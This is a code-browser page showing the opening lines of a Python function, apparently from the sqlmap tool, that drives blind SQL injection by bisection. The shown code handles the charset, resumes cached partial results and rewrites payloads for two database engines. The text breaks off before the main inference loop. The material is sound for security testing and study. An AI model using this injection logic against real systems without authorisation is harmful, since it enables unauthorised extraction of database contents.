
Function bisection

lib/techniques/blind/inference.py:67–730  ·  view source on GitHub ↗

Bisection algorithm that can be used to perform blind SQL injection on an affected host

(payload, expression, length=None, charsetType=None, firstChar=None, lastChar=None, dump=False)


65from thirdparty import six
66
67def bisection(payload, expression, length=None, charsetType=None, firstChar=None, lastChar=None, dump=False):
68 """
69 Bisection algorithm that can be used to perform blind SQL injection
70 on an affected host
71 """
72
73 abortedFlag = False
74 showEta = False
75 partialValue = u""
76 finalValue = None
77 retrievedLength = 0
78
79 if payload is None:
80 return 0, None
81
82 if charsetType is None and conf.charset:
83 asciiTbl = sorted(set(ord(_) for _ in conf.charset))
84 else:
85 asciiTbl = getCharset(charsetType)
86
87 threadData = getCurrentThreadData()
88 timeBasedCompare = (getTechnique() in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED))
89 retVal = hashDBRetrieve(expression, checkConf=True)
90
91 if retVal:
92 if conf.repair and INFERENCE_UNKNOWN_CHAR in retVal:
93 pass
94 elif PARTIAL_HEX_VALUE_MARKER in retVal:
95 retVal = retVal.replace(PARTIAL_HEX_VALUE_MARKER, "")
96
97 if retVal and conf.hexConvert:
98 partialValue = retVal
99 infoMsg = "resuming partial value: %s" % safecharencode(partialValue)
100 logger.info(infoMsg)
101 elif PARTIAL_VALUE_MARKER in retVal:
102 retVal = retVal.replace(PARTIAL_VALUE_MARKER, "")
103
104 if retVal and not conf.hexConvert:
105 partialValue = retVal
106 infoMsg = "resuming partial value: %s" % safecharencode(partialValue)
107 logger.info(infoMsg)
108 else:
109 infoMsg = "resumed: %s" % safecharencode(retVal)
110 logger.info(infoMsg)
111
112 return 0, retVal
113
114 if Backend.isDbms(DBMS.MCKOI):
115 match = re.search(r"\ASELECT\b(.+)\bFROM\b(.+)\Z", expression, re.I)
116 if match:
117 original = queries[Backend.getIdentifiedDbms()].inference.query
118 right = original.split('<')[1]
119 payload = payload.replace(right, "(SELECT %s FROM %s)" % (right, match.group(2).strip()))
120 expression = match.group(1).strip()
121
122 elif Backend.isDbms(DBMS.FRONTBASE):
123 match = re.search(r"\ASELECT\b(\s+TOP\s*\([^)]+\)\s+)?(.+)\bFROM\b(.+)\Z", expression, re.I)
124 if match:
